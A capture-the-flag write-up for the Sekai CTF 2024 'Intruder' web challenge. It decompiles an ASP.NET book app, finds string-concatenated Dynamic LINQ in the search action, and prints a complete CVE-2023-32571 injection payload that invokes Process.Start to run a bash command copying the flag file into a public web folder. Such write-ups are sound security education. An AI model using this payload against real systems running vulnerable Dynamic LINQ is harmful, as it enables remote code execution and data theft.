SEKAI CTF 2024 | Intruder (Web, Linq Injection)

Difficulty : Easy

Reversing the code :

A peculiar challenge that I managed to solve in the Sekai CTF 2024.

We start by downloading the files, and we get a bunch of DLL files with a dockerfile and a docker-compose file, we only need to check the dockerfile to see that it's an asp.net application.

FROM mcr.microsoft.com/dotnet/aspnet:7.0

RUN useradd -m ctf

COPY flag.txt /flag.txt
RUN mv /flag.txt /flag_`cat /proc/sys/kernel/random/uuid`.txt

RUN chown root:root /flag_*.txt
RUN chmod 444 /flag_*.txt

WORKDIR /app/src

COPY src .
RUN chown -R ctf:ctf /app/src/
RUN chmod -R +w /app/src/

USER ctf
EXPOSE 80
ENTRYPOINT ["dotnet", "CRUD.dll"]

We can reverse the CRUD.dll using dnSpy.

when reversing the book controller we come across this piece of code :

[NullableContext(1)]
	[Nullable(0)]
	public class BookController : Controller
	{
		// Token: 0x060000B1 RID: 177 RVA: 0x00002F08 File Offset: 0x00001108
		public IActionResult Index(string searchString, int page = 1, int pageSize = 5)
		{
			IActionResult result;
			try
			{
				IQueryable<Book> query = BookController._books.AsQueryable<Book>();
				if (!string.IsNullOrEmpty(searchString))
				{
					query = query.Where("Title.Contains(\"" + searchString + "\")", Array.Empty<object>());
				}
				int totalItems = query.Count<Book>();
				int totalPages = (int)Math.Ceiling((double)totalItems / (double)pageSize);
				List<Book> books = query.Skip((page - 1) * pageSize).Take(pageSize).ToList<Book>();
				BookPaginationModel viewModel = new BookPaginationModel
				{
					Books = books,
					TotalPages = totalPages,
					CurrentPage = page
				};
				result = this.View(viewModel);
			}
			catch (Exception ex)
			{
				base.TempData["Error"] = "Something wrong happened while searching!";
				result = this.Redirect("/books");
			}
			return result;
		}

		// Token: 0x060000B2 RID: 178 RVA: 0x00002FD0 File Offset: 0x000011D0
		public IActionResult Add()
		{
			return this.View();
		}

this signifies that the Add book function is just a decoy and that our objective is to do a Linq injection in the search method.

While searching the internet you can come across the CVE-2023-32571, which is an RCE exploit to linq that we will exploit.

I used this POC to create my payload :

GitHub - Tris0n/CVE-2023-32571-POCGitHub

Exploitation :

Since the challenge is disconnected from the internet we couldn't run a rev shell or send the flag via http, one way to exploit it is to copy the flag to the /app/src/wwwroot/img/covers, this so we can access it.

") and "".GetType().Assembly.DefinedTypes.Where(it.Name == "AppDomain").First().DeclaredMethods.Where(it.Name == "CreateInstanceAndUnwrap").First().Invoke("".GetType().Assembly.DefinedTypes.Where(it.Name == "AppDomain").First().DeclaredProperties.Where(it.name == "CurrentDomain").First().GetValue(null), "System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089; System.Diagnostics.Process".Split(";".ToCharArray())).GetType().Assembly.DefinedTypes.Where(it.Name == "Process").First().DeclaredMethods.Where(it.name == "Start").Take(3).Last().Invoke(null, "bash; -c \"cat /flag* > /app/src/wwwroot/img/covers/flag.txt \"".Split(";".ToCharArray()))==("

we copy that payload into the search bar and we get our flag by accessing http://<CTF-Instance>/img/covers/flag.txt